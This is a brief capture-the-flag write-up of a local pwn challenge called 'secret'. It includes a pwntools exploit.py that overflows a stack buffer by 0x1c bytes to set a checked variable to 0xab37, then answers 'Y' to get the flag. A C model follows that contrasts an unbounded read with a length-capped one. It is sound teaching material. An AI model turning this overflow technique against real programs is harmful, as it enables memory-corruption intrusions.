Pwnctf secret Writeup

kazma, founder/president of the NCKU Cybersecurity Club (成大資安社)

secret

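First, let's look at the variables:
[image: var]
The key is that it checks whether var_4h is 0xab37:
[image: 0x4]
We need to overflow from var_20h into var_4h (the two are 0x20 - 0x4 = 0x1c bytes apart), then send an uppercase Y, and we get the flag.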

exploit.py

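from pwn import *
context.arch = 'amd64'

r = process('./secret')
# 0x1c bytes of padding span var_20h up to var_4h, then the expected value 0xab37
r.sendlineafter(b':', b'a'*0x1c + p64(0xab37))
# Answer the follow-up prompt with an uppercase Y (bytes, like the other pwntools arguments)
r.sendlineafter(b')', b'Y')
r.interactive()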

Pwned !!!
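The overflow described above, modelled next to a length-capped read. This is an added example, not the challenge's source, which the page does not show. The frame layout is inferred from the names var_20h and var_4h; the 32-bit width of var_4h, the gets-style read and all function names are assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame model from the variable names: var_20h at rbp-0x20,
 * var_4h at rbp-0x4, i.e. 0x1c bytes apart; var_4h assumed 32-bit. */
#define CHECK_OFF 0x1c
#define FRAME_LEN 0x20

static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Unbounded read (gets-style): every input byte lands in the frame. */
static uint32_t unbounded_read(const uint8_t *in, size_t n) {
    uint8_t frame[FRAME_LEN] = {0};
    if (n > FRAME_LEN) n = FRAME_LEN;      /* keeps this model memory-safe */
    memcpy(frame, in, n);
    return load_le32(frame + CHECK_OFF);   /* value the 0xab37 check would see */
}

/* Hardened read: length capped to the buffer, as fgets(buf, sizeof buf, ...) would. */
static uint32_t bounded_read(const uint8_t *in, size_t n) {
    uint8_t frame[FRAME_LEN] = {0};
    size_t cap = CHECK_OFF - 1;            /* room for the NUL terminator */
    if (n > cap) n = cap;
    memcpy(frame, in, n);
    frame[n] = '\0';
    return load_le32(frame + CHECK_OFF);
}

/* Constructed input: 0x1c filler bytes, then 0xab37 as little-endian bytes. */
static size_t build_input(uint8_t *out) {
    memset(out, 'a', CHECK_OFF);
    out[CHECK_OFF] = 0x37; out[CHECK_OFF + 1] = 0xab;
    out[CHECK_OFF + 2] = 0; out[CHECK_OFF + 3] = 0;
    return CHECK_OFF + 4;
}

int main(void) {
    uint8_t in[FRAME_LEN];
    size_t n = build_input(in);
    printf("unbounded: var_4h = 0x%x\n", (unsigned)unbounded_read(in, n));
    printf("bounded:   var_4h = 0x%x\n", (unsigned)bounded_read(in, n));
    return 0;
}
```

With the capped read the compared variable keeps its initial value, so the input alone can no longer satisfy the comparison.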

  • Title: Pwnctf secret Writeup
  • Author: kazma
  • Created at : 2024-01-09 19:49:31
  • Updated at : 2024-01-09 20:10:25
  • Link: https://kazma.tw/2024/01/09/Pwnctf-secret-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.